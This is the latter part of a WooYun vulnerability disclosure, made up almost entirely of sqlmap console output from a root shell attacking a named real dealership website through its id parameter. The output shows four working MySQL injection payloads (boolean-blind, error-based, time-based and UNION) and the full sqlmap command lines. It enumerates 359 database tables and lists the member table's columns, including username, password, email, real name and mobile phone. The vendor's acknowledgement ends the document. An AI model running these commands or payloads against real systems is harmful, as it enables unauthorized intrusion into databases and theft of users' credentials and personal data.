[23:12:30] [INFO] retrieved: pw_favors
[23:12:31] [INFO] retrieved: pw_feed
[23:12:36] [INFO] retrieved: pw_filter
[23:12:37] [INFO] retrieved: pw_filter_class
[23:12:37] [INFO] retrieved: pw_filter_dictionary
[23:12:38] [INFO] retrieved: pw_focus
[23:12:43] [INFO] retrieved: pw_forumdata
[23:12:43] [INFO] retrieved: pw_forumlog
[23:12:44] [INFO] retrieved: pw_forummsg
[23:12:50] [INFO] retrieved: pw_forums
[23:12:50] [INFO] retrieved: pw_forumsell
[23:12:55] [INFO] retrieved: pw_forumsextra
[23:13:01] [INFO] retrieved: pw_forumtype
[23:13:01] [INFO] retrieved: pw_friends
[23:13:07] [INFO] retrieved: pw_friendtype
[23:13:07] [INFO] retrieved: pw_group_replay
[23:13:08] [INFO] retrieved: pw_hack
[23:13:08] [INFO] retrieved: pw_help
[23:13:08] [INFO] retrieved: pw_hits_threads
[23:13:09] [INFO] retrieved: pw_home
[23:13:09] [INFO] retrieved: pw_invitecode
[23:13:10] [INFO] retrieved: pw_inviterecord
[23:13:10] [INFO] retrieved: pw_invoke
[23:13:11] [INFO] retrieved: pw_invokepiece
[23:13:11] [INFO] retrieved: pw_ipstates
[23:13:11] [INFO] retrieved: pw_job
[23:13:12] [INFO] retrieved: pw_jober
[23:13:13] [INFO] retrieved: pw_kmd_info
[23:13:13] [INFO] retrieved: pw_kmd_paylog
[23:13:13] [INFO] retrieved: pw_kmd_spread
[23:13:14] [INFO] retrieved: pw_kmd_user
[23:13:14] [INFO] retrieved: pw_log_aggregate
[23:13:15] [INFO] retrieved: pw_log_attachs
[23:13:15] [INFO] retrieved: pw_log_colonys
[23:13:15] [INFO] retrieved: pw_log_diary
[23:13:16] [INFO] retrieved: pw_log_forums
[23:13:21] [INFO] retrieved: pw_log_members
[23:13:27] [INFO] retrieved: pw_log_postdefend
[23:13:27] [INFO] retrieved: pw_log_posts
[23:13:27] [INFO] retrieved: pw_log_postverify
[23:13:28] [INFO] retrieved: pw_log_setting
[23:13:28] [INFO] retrieved: pw_log_threads
[23:13:29] [INFO] retrieved: pw_log_userdefend
[23:13:29] [INFO] retrieved: pw_log_weibos
[23:13:30] [INFO] retrieved: pw_medal_apply
[23:13:30] [INFO] retrieved: pw_medal_award
[23:13:30] [INFO] retrieved: pw_medal_info
[23:13:31] [INFO] retrieved: pw_medal_log
[23:13:31] [INFO] retrieved: pw_medalinfo
[23:13:31] [INFO] retrieved: pw_medalslogs
[23:13:32] [INFO] retrieved: pw_medaluser
[23:13:32] [INFO] retrieved: pw_member_behavior_statistic
[23:13:33] [INFO] retrieved: pw_membercredit
[23:13:33] [INFO] retrieved: pw_memberdata
[23:13:34] [INFO] retrieved: pw_memberinfo
[23:13:34] [INFO] retrieved: pw_members
[23:13:35] [INFO] retrieved: pw_members0705
[23:13:40] [INFO] retrieved: pw_members123
[23:13:41] [INFO] retrieved: pw_membersnew
[23:13:41] [INFO] retrieved: pw_membertags
[23:13:41] [INFO] retrieved: pw_membertags_relations
[23:13:42] [INFO] retrieved: pw_memo
[23:13:42] [INFO] retrieved: pw_merge_posts
[23:13:43] [INFO] retrieved: pw_merge_tmsgs
[23:13:49] [INFO] retrieved: pw_modehot
[23:13:49] [INFO] retrieved: pw_modules
[23:13:49] [INFO] retrieved: pw_mpageconfig
[23:13:50] [INFO] retrieved: pw_ms_attachs
[23:13:50] [INFO] retrieved: pw_ms_configs
[23:13:51] [INFO] retrieved: pw_ms_messages
[23:13:51] [INFO] retrieved: pw_ms_relations
[23:13:52] [INFO] retrieved: pw_ms_replies
[23:13:53] [INFO] retrieved: pw_ms_searchs
[23:13:54] [INFO] retrieved: pw_ms_tasks
[23:13:54] [INFO] retrieved: pw_msg
[23:13:54] [INFO] retrieved: pw_msgc
[23:13:55] [INFO] retrieved: pw_msglog
[23:13:55] [INFO] retrieved: pw_nav
[23:13:56] [INFO] retrieved: pw_oboard
[23:13:56] [INFO] retrieved: pw_online
[23:13:56] [INFO] retrieved: pw_online_guest
[23:13:57] [INFO] retrieved: pw_online_statistics
[23:13:57] [INFO] retrieved: pw_online_user
[23:13:58] [INFO] retrieved: pw_ouserdata
[23:13:58] [INFO] retrieved: pw_overprint
[23:13:58] [INFO] retrieved: pw_owritedata
[23:13:59] [INFO] retrieved: pw_pagecache
[23:13:59] [INFO] retrieved: pw_pageinvoke
[23:14:00] [INFO] retrieved: pw_pcfield
[23:14:00] [INFO] retrieved: pw_pcmember
[23:14:01] [INFO] retrieved: pw_pcvalue1
[23:14:01] [INFO] retrieved: pw_permission
[23:14:01] [INFO] retrieved: pw_pidtmp
[23:14:07] [INFO] retrieved: pw_pinglog
[23:14:07] [INFO] retrieved: pw_plan
[23:14:08] [INFO] retrieved: pw_polls
[23:14:08] [INFO] retrieved: pw_portalpage
[23:14:09] [INFO] retrieved: pw_postcate
[23:14:09] [INFO] retrieved: pw_posts
[23:14:09] [INFO] retrieved: pw_postsfloor
[23:14:10] [INFO] retrieved: pw_poststopped
[23:14:10] [INFO] retrieved: pw_privacy
[23:14:11] [INFO] retrieved: pw_proclock
[23:14:20] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[23:14:22] [INFO] retrieved: pw_pushdata
[23:14:22] [INFO] retrieved: pw_pushpic
[23:14:23] [INFO] retrieved: pw_rate
[23:14:23] [INFO] retrieved: pw_rateconfig
[23:14:23] [INFO] retrieved: pw_rateresult
[23:14:33] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[23:14:35] [INFO] retrieved: pw_recycle
[23:14:35] [INFO] retrieved: pw_replyreward
[23:14:36] [INFO] retrieved: pw_replyrewardrecord
[23:14:36] [INFO] retrieved: pw_report
[23:14:37] [INFO] retrieved: pw_reward
[23:14:46] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[23:14:48] [INFO] retrieved: pw_robbuild
[23:14:48] [INFO] retrieved: pw_robbuildfloor
[23:14:49] [INFO] retrieved: pw_schcache
[23:14:49] [INFO] retrieved: pw_school
[23:14:49] [INFO] retrieved: pw_searchadvert
[23:14:50] [INFO] retrieved: pw_searchforum
[23:14:51] [INFO] retrieved: pw_searchfourm
[23:14:51] [INFO] retrieved: pw_searchhotwords
[23:14:52] [INFO] retrieved: pw_searchstatistic
[23:14:52] [INFO] retrieved: pw_setform
[23:14:53] [INFO] retrieved: pw_sharelinks
[23:14:53] [INFO] retrieved: pw_sharelinksrelation
[23:14:53] [INFO] retrieved: pw_sharelinkstype
[23:14:54] [INFO] retrieved: pw_singleright
[23:14:54] [INFO] retrieved: pw_smiles
[23:14:55] [INFO] retrieved: pw_space
[23:14:55] [INFO] retrieved: pw_sqlcv
[23:14:55] [INFO] retrieved: pw_stamp
[23:14:56] [INFO] retrieved: pw_statistics_daily
[23:14:56] [INFO] retrieved: pw_stopic
[23:14:57] [INFO] retrieved: pw_stopic_comment
[23:14:57] [INFO] retrieved: pw_stopic_commentreply
[23:14:58] [INFO] retrieved: pw_stopicblock
[23:14:58] [INFO] retrieved: pw_stopiccategory
[23:14:59] [INFO] retrieved: pw_stopicpictures
[23:14:59] [INFO] retrieved: pw_stopicunit
[23:14:59] [INFO] retrieved: pw_styles
[23:15:00] [INFO] retrieved: pw_tagdata
[23:15:00] [INFO] retrieved: pw_tags
[23:15:01] [INFO] retrieved: pw_task
[23:15:01] [INFO] retrieved: pw_temp_keywords
[23:15:01] [INFO] retrieved: pw_threads
[23:15:02] [INFO] retrieved: pw_threads_at
[23:15:02] [INFO] retrieved: pw_threads_img
[23:15:03] [INFO] retrieved: pw_tmsgs
[23:15:03] [INFO] retrieved: pw_toollog
[23:15:04] [INFO] retrieved: pw_tools
[23:15:04] [INFO] retrieved: pw_topiccate
[23:15:04] [INFO] retrieved: pw_topicfield
[23:15:05] [INFO] retrieved: pw_topicmodel
[23:15:10] [INFO] retrieved: pw_topictype
[23:15:10] [INFO] retrieved: pw_topicvalue1
[23:15:20] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[23:15:22] [INFO] retrieved: pw_topicvalue2
[23:15:27] [INFO] retrieved: pw_topicvalue3
[23:15:28] [INFO] retrieved: pw_topicvalue4
[23:15:28] [INFO] retrieved: pw_topicvalue5
[23:15:28] [INFO] retrieved: pw_topicvalue6
[23:15:29] [INFO] retrieved: pw_topicvalue7
[23:15:29] [INFO] retrieved: pw_topicvalue8
[23:15:30] [INFO] retrieved: pw_tpl
[23:15:30] [INFO] retrieved: pw_tpltype
[23:15:30] [INFO] retrieved: pw_trade
[23:15:31] [INFO] retrieved: pw_tradeorder
[23:15:31] [INFO] retrieved: pw_ucapp
[23:15:32] [INFO] retrieved: pw_ucnotify
[23:15:32] [INFO] retrieved: pw_ucsyncredit
[23:15:33] [INFO] retrieved: pw_user_career
[23:15:33] [INFO] retrieved: pw_user_education
[23:15:34] [INFO] retrieved: pw_userapp
[23:15:34] [INFO] retrieved: pw_userbinding
[23:15:34] [INFO] retrieved: pw_usercache
[23:15:35] [INFO] retrieved: pw_usergroups
[23:15:35] [INFO] retrieved: pw_usertool
[23:15:36] [INFO] retrieved: pw_voter
[23:15:36] [INFO] retrieved: pw_wappush
[23:15:36] [INFO] retrieved: pw_wappushtype
[23:15:37] [INFO] retrieved: pw_weibo_bind
[23:15:46] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[23:15:48] [INFO] retrieved: pw_weibo_cmrelations
[23:15:48] [INFO] retrieved: pw_weibo_cnrelations
[23:15:49] [INFO] retrieved: pw_weibo_comment
[23:15:49] [INFO] retrieved: pw_weibo_content
[23:15:49] [INFO] retrieved: pw_weibo_login_session
[23:15:50] [INFO] retrieved: pw_weibo_login_user
[23:15:50] [INFO] retrieved: pw_weibo_referto
[23:15:51] [INFO] retrieved: pw_weibo_relations
[23:15:51] [INFO] retrieved: pw_weibo_topicattention
[23:15:52] [INFO] retrieved: pw_weibo_topicrelations
[23:15:52] [INFO] retrieved: pw_weibo_topics
[23:15:52] [INFO] retrieved: pw_windcode
[23:15:58] [INFO] retrieved: pw_wordfb
[23:16:07] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[23:16:09] [INFO] retrieved: pw_write_smiles
[23:16:09] [INFO] retrieved: pw_yun_setting
[23:16:10] [INFO] retrieved: topic
[23:16:10] [INFO] retrieved: trip
[23:16:15] [INFO] retrieved: user
[23:16:16] [INFO] retrieved: user_bak
[23:16:16] [INFO] retrieved: userfun
[23:16:17] [INFO] retrieved: usergroup
[23:16:17] [INFO] retrieved: wqw_city
[23:16:18] [INFO] retrieved: wqw_prov
[23:16:18] [INFO] retrieved: xly_user
[23:16:18] [INFO] retrieved: xunlianying
Database: paladinclub
[359 tables]
+------------------------------+
| language |
| user |
| a_customers |
| a_floor |
| a_user |
| article |
| carinfo |
| category |
| cj_jl |
| clubblock |
| clubinfo |
| czhd_memberinfo |
| dakar |
| dakar2006 |
| dakar20061 |
| dakar20062 |
| dakar20063 |
| dakar_config |
| east2008_answer |
| east2008_loginrecord |
| east2008_question |
| east2008_user |
| east2008pho_loginrecord |
| east2008pho_photo |
| east2008pho_toupiao |
| east2008pho_user |
| eastgames_notify |
| fankui |
| file_flow |
| file_flow_060817_bak |
| file_info |
| file_info_060817_bak |
| file_save |
| file_share |
| file_share_060817_bak |
| hk_article |
| hk_class |
| huikan |
| imagefile |
| imgcategory |
| khly_hz |
| linesname |
| lmsj |
| media |
| memberawoke |
| memberinfo |
| memberinfo1 |
| memberinfo_bak |
| memberinfo_t |
| membermark |
| membermodify |
| memberpay |
| oneq_mission |
| oneq_missiondata |
| online |
| paladin_awards |
| prov |
| pw_actattachs |
| pw_actions |
| pw_active |
| pw_activity |
| pw_activitycate |
| pw_activitydefaultvalue |
| pw_activityfield |
| pw_activitymembers |
| pw_activitymodel |
| pw_activitypaylog |
| pw_activityvalue1 |
| pw_activityvalue10 |
| pw_activityvalue11 |
| pw_activityvalue12 |
| pw_activityvalue13 |
| pw_activityvalue14 |
| pw_activityvalue15 |
| pw_activityvalue16 |
| pw_activityvalue17 |
| pw_activityvalue18 |
| pw_activityvalue2 |
| pw_activityvalue3 |
| pw_activityvalue4 |
| pw_activityvalue5 |
| pw_activityvalue6 |
| pw_activityvalue7 |
| pw_activityvalue8 |
| pw_activityvalue9 |
| pw_actmember |
| pw_actmembers |
| pw_administrators |
| pw_adminlog |
| pw_adminset |
| pw_advert |
| pw_announce |
| pw_area_level |
| pw_areas |
| pw_argument |
| pw_attachbuy |
| pw_attachdownload |
| pw_attachs |
| pw_attention |
| pw_attention_blacklist |
| pw_auth_certificate |
| pw_ban |
| pw_banuser |
| pw_bbsinfo |
| pw_block |
| pw_buyadvert |
| pw_cache |
| pw_cache_distribute |
| pw_cache_members |
| pw_cachedata |
| pw_channel |
| pw_clientorder |
| pw_cmembers |
| pw_cms_article |
| pw_cms_articlecontent |
| pw_cms_articleextend |
| pw_cms_attach |
| pw_cms_column |
| pw_cms_comment |
| pw_cms_commentreply |
| pw_cms_purview |
| pw_cnalbum |
| pw_cnclass |
| pw_cnlevel |
| pw_cnphoto |
| pw_cnskin |
| pw_cnstyles |
| pw_collection |
| pw_collectiontype |
| pw_colonys |
| pw_comment |
| pw_company |
| pw_config |
| pw_creditlog |
| pw_credits |
| pw_customfield |
| pw_cwritedata |
| pw_datanalyse |
| pw_datastate |
| pw_datastore |
| pw_debateclass |
| pw_debatedata |
| pw_debateinfo |
| pw_debatereplys |
| pw_debates |
| pw_debatethreads |
| pw_delta_diarys |
| pw_delta_members |
| pw_delta_posts |
| pw_delta_threads |
| pw_diary |
| pw_diarytype |
| pw_draft |
| pw_elements |
| pw_extragroups |
| pw_favors |
| pw_feed |
| pw_filter |
| pw_filter_class |
| pw_filter_dictionary |
| pw_focus |
| pw_forumdata |
| pw_forumlog |
| pw_forummsg |
| pw_forums |
| pw_forumsell |
| pw_forumsextra |
| pw_forumtype |
| pw_friends |
| pw_friendtype |
| pw_group_replay |
| pw_hack |
| pw_help |
| pw_hits_threads |
| pw_home |
| pw_invitecode |
| pw_inviterecord |
| pw_invoke |
| pw_invokepiece |
| pw_ipstates |
| pw_job |
| pw_jober |
| pw_kmd_info |
| pw_kmd_paylog |
| pw_kmd_spread |
| pw_kmd_user |
| pw_log_aggregate |
| pw_log_attachs |
| pw_log_colonys |
| pw_log_diary |
| pw_log_forums |
| pw_log_members |
| pw_log_postdefend |
| pw_log_posts |
| pw_log_postverify |
| pw_log_setting |
| pw_log_threads |
| pw_log_userdefend |
| pw_log_weibos |
| pw_medal_apply |
| pw_medal_award |
| pw_medal_info |
| pw_medal_log |
| pw_medalinfo |
| pw_medalslogs |
| pw_medaluser |
| pw_member_behavior_statistic |
| pw_membercredit |
| pw_memberdata |
| pw_memberinfo |
| pw_members |
| pw_members0705 |
| pw_members123 |
| pw_membersnew |
| pw_membertags |
| pw_membertags_relations |
| pw_memo |
| pw_merge_posts |
| pw_merge_tmsgs |
| pw_modehot |
| pw_modules |
| pw_mpageconfig |
| pw_ms_attachs |
| pw_ms_configs |
| pw_ms_messages |
| pw_ms_relations |
| pw_ms_replies |
| pw_ms_searchs |
| pw_ms_tasks |
| pw_msg |
| pw_msgc |
| pw_msglog |
| pw_nav |
| pw_oboard |
| pw_online |
| pw_online_guest |
| pw_online_statistics |
| pw_online_user |
| pw_ouserdata |
| pw_overprint |
| pw_owritedata |
| pw_pagecache |
| pw_pageinvoke |
| pw_pcfield |
| pw_pcmember |
| pw_pcvalue1 |
| pw_permission |
| pw_pidtmp |
| pw_pinglog |
| pw_plan |
| pw_polls |
| pw_portalpage |
| pw_postcate |
| pw_posts |
| pw_postsfloor |
| pw_poststopped |
| pw_privacy |
| pw_proclock |
| pw_pushdata |
| pw_pushpic |
| pw_rate |
| pw_rateconfig |
| pw_rateresult |
| pw_recycle |
| pw_replyreward |
| pw_replyrewardrecord |
| pw_report |
| pw_reward |
| pw_robbuild |
| pw_robbuildfloor |
| pw_schcache |
| pw_school |
| pw_searchadvert |
| pw_searchforum |
| pw_searchfourm |
| pw_searchhotwords |
| pw_searchstatistic |
| pw_setform |
| pw_sharelinks |
| pw_sharelinksrelation |
| pw_sharelinkstype |
| pw_singleright |
| pw_smiles |
| pw_space |
| pw_sqlcv |
| pw_stamp |
| pw_statistics_daily |
| pw_stopic |
| pw_stopic_comment |
| pw_stopic_commentreply |
| pw_stopicblock |
| pw_stopiccategory |
| pw_stopicpictures |
| pw_stopicunit |
| pw_styles |
| pw_tagdata |
| pw_tags |
| pw_task |
| pw_temp_keywords |
| pw_threads |
| pw_threads_at |
| pw_threads_img |
| pw_tmsgs |
| pw_toollog |
| pw_tools |
| pw_topiccate |
| pw_topicfield |
| pw_topicmodel |
| pw_topictype |
| pw_topicvalue1 |
| pw_topicvalue2 |
| pw_topicvalue3 |
| pw_topicvalue4 |
| pw_topicvalue5 |
| pw_topicvalue6 |
| pw_topicvalue7 |
| pw_topicvalue8 |
| pw_tpl |
| pw_tpltype |
| pw_trade |
| pw_tradeorder |
| pw_ucapp |
| pw_ucnotify |
| pw_ucsyncredit |
| pw_user_career |
| pw_user_education |
| pw_userapp |
| pw_userbinding |
| pw_usercache |
| pw_usergroups |
| pw_usertool |
| pw_voter |
| pw_wappush |
| pw_wappushtype |
| pw_weibo_bind |
| pw_weibo_cmrelations |
| pw_weibo_cnrelations |
| pw_weibo_comment |
| pw_weibo_content |
| pw_weibo_login_session |
| pw_weibo_login_user |
| pw_weibo_referto |
| pw_weibo_relations |
| pw_weibo_topicattention |
| pw_weibo_topicrelations |
| pw_weibo_topics |
| pw_windcode |
| pw_wordfb |
| pw_write_smiles |
| pw_yun_setting |
| topic |
| trip |
| user_bak |
| userfun |
| usergroup |
| wqw_city |
| wqw_prov |
| xly_user |
| xunlianying |
+------------------------------+
[23:16:18] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.zznissan.com.cn'
[*] shutting down at 23:16:18
root@kailroot:~# sqlmap -u http://www.zznissan.com.cn/dongfengfengdu/buy/online_read.php?id=8 --columns -T memberawoke -D paladinclub
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20151024}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 23:18:42
[23:18:42] [INFO] resuming back-end DBMS 'mysql'
[23:18:42] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=8 RLIKE (SELECT (CASE WHEN (7706=7706) THEN 8 ELSE 0x28 END))
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=8 AND (SELECT 5091 FROM(SELECT COUNT(*),CONCAT(0x717a787871,(SELECT (ELT(5091=5091,1))),0x71786b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: id=8 OR SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: id=-7685 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a787871,0x4b62496a6f72524e5743,0x71786b6b71)--
---
[23:18:43] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[23:18:43] [INFO] fetching columns for table 'memberawoke' in database 'paladinclub'
[23:18:44] [INFO] the SQL query used returns 19 entries
[23:18:45] [INFO] retrieved: "id","int(10)"
[23:18:45] [INFO] retrieved: "memberid","int(10)"
[23:18:46] [INFO] retrieved: "message","varchar(125)"
[23:18:46] [INFO] retrieved: "overdate","date"
[23:18:46] [INFO] retrieved: "isread","tinyint(4)"
[23:18:47] [INFO] retrieved: "awoketime","int(2)"
[23:18:56] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[23:18:58] [INFO] retrieved: "awoketype","varchar(2)"
[23:18:58] [INFO] retrieved: "smsfrom","varchar(25)"
[23:18:58] [INFO] retrieved: "ifsend","varchar(255)"
[23:18:59] [INFO] retrieved: "ifsuccess","varchar(255)"
[23:18:59] [INFO] retrieved: "err","varchar(255)"
[23:19:00] [INFO] retrieved: "errid","varchar(255)"
[23:19:00] [INFO] retrieved: "num","int(11)"
[23:19:01] [INFO] retrieved: "fopen","varchar(255)"
[23:19:01] [INFO] retrieved: "mobilephone","varchar(255)"
[23:19:01] [INFO] retrieved: "memawo_mis_id","int(11)"
[23:19:02] [INFO] retrieved: "memawo_misd_id","int(11)"
[23:19:02] [INFO] retrieved: "memawo_addtime","datetime"
[23:19:03] [INFO] retrieved: "memawo_timestamp","timestamp"
Database: paladinclub
Table: memberawoke
[19 columns]
+------------------+--------------+
| Column | Type |
+------------------+--------------+
| awoketime | int(2) |
| awoketype | varchar(2) |
| err | varchar(255) |
| errid | varchar(255) |
| fopen | varchar(255) |
| id | int(10) |
| ifsend | varchar(255) |
| ifsuccess | varchar(255) |
| isread | tinyint(4) |
| memawo_addtime | datetime |
| memawo_mis_id | int(11) |
| memawo_misd_id | int(11) |
| memawo_timestamp | timestamp |
| memberid | int(10) |
| message | varchar(125) |
| mobilephone | varchar(255) |
| num | int(11) |
| overdate | date |
| smsfrom | varchar(25) |
+------------------+--------------+
[23:19:03] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.zznissan.com.cn'
[*] shutting down at 23:19:03
root@kailroot:~# sqlmap -u http://www.zznissan.com.cn/dongfengfengdu/buy/online_read.php?id=8 --columns -T pw_members -D paladinclub
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20151024}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 23:20:02
[23:20:02] [INFO] resuming back-end DBMS 'mysql'
[23:20:02] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=8 RLIKE (SELECT (CASE WHEN (7706=7706) THEN 8 ELSE 0x28 END))
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=8 AND (SELECT 5091 FROM(SELECT COUNT(*),CONCAT(0x717a787871,(SELECT (ELT(5091=5091,1))),0x71786b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: id=8 OR SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: id=-7685 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x717a787871,0x4b62496a6f72524e5743,0x71786b6b71)--
---
[23:20:03] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[23:20:03] [INFO] fetching columns for table 'pw_members' in database 'paladinclub'
[23:20:04] [INFO] the SQL query used returns 41 entries
[23:20:04] [INFO] retrieved: "uid","int(10) unsigned"
[23:20:05] [INFO] retrieved: "username","varchar(50)"
[23:20:05] [INFO] retrieved: "password","varchar(100)"
[23:20:05] [INFO] retrieved: "safecv","varchar(10)"
[23:20:11] [INFO] retrieved: "email","varchar(30)"
[23:20:11] [INFO] retrieved: "groupid","tinyint(3)"
[23:20:12] [INFO] retrieved: "memberid","tinyint(3)"
[23:20:12] [INFO] retrieved: "groups","varchar(128)"
[23:20:13] [INFO] retrieved: "icon","varchar(255)"
[23:20:13] [INFO] retrieved: "gender","tinyint(1)"
[23:20:14] [INFO] retrieved: "regdate","int(10) unsigned"
[23:20:14] [INFO] retrieved: "signature","text"
[23:20:15] [INFO] retrieved: "introduce","text"
[23:20:15] [INFO] retrieved: "oicq","varchar(6)"
[23:20:16] [INFO] retrieved: "aliww","varchar(30)"
[23:20:16] [INFO] retrieved: "icq","varchar(6)"
[23:20:16] [INFO] retrieved: "msn","varchar(18)"
[23:20:17] [INFO] retrieved: "yahoo","varchar(18)"
[23:20:17] [INFO] retrieved: "site","varchar(38)"
[23:20:18] [INFO] retrieved: "location","varchar(18)"
[23:20:18] [INFO] retrieved: "honor","varchar(15)"
[23:20:18] [INFO] retrieved: "bday","date"
[23:20:19] [INFO] retrieved: "lastaddrst","varchar(255)"
[23:20:19] [INFO] retrieved: "yz","int(10)"
[23:20:19] [INFO] retrieved: "timedf","varchar(3)"
[23:20:20] [INFO] retrieved: "style","varchar(6)"
[23:20:20] [INFO] retrieved: "datefm","varchar(8)"
[23:20:21] [INFO] retrieved: "t_num","tinyint(3) unsigned"
[23:20:21] [INFO] retrieved: "p_num","tinyint(3) unsigned"
[23:20:21] [INFO] retrieved: "attach","varchar(50)"
[23:20:22] [INFO] retrieved: "hack","varchar(128)"
[23:20:22] [INFO] retrieved: "newpm","smallint(6) unsigned"
[23:20:23] [INFO] retrieved: "banpm","text"
[23:20:23] [INFO] retrieved: "msggroups","varchar(128)"
[23:20:24] [INFO] retrieved: "medals","varchar(128)"
[23:20:24] [INFO] retrieved: "userstatus","int(10) unsigned"
[23:20:25] [INFO] retrieved: "shortcut","varchar(255)"
[23:20:25] [INFO] retrieved: "authmobile","char(16)"
[23:20:25] [INFO] retrieved: "realname","varchar(16)"
[23:20:26] [INFO] retrieved: "apartment","int(10) unsigned"
[23:20:26] [INFO] retrieved: "home","int(10) unsigned"
Database: paladinclub
Table: pw_members
[41 columns]
+------------+----------------------+
| Column | Type |
+------------+----------------------+
| aliww | varchar(30) |
| apartment | int(10) unsigned |
| attach | varchar(50) |
| authmobile | char(16) |
| banpm | text |
| bday | date |
| datefm | varchar(8) |
| email | varchar(30) |
| gender | tinyint(1) |
| groupid | tinyint(3) |
| groups | varchar(128) |
| hack | varchar(128) |
| home | int(10) unsigned |
| honor | varchar(15) |
| icon | varchar(255) |
| icq | varchar(6) |
| introduce | text |
| lastaddrst | varchar(255) |
| location | varchar(18) |
| medals | varchar(128) |
| memberid | tinyint(3) |
| msggroups | varchar(128) |
| msn | varchar(18) |
| newpm | smallint(6) unsigned |
| oicq | varchar(6) |
| p_num | tinyint(3) unsigned |
| password | varchar(100) |
| realname | varchar(16)

修复方案:

I Don't Know

版权声明:转载请注明来源 SunnyDoll@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-11-27 15:59

厂商回复:

已收到。

最新状态:

暂无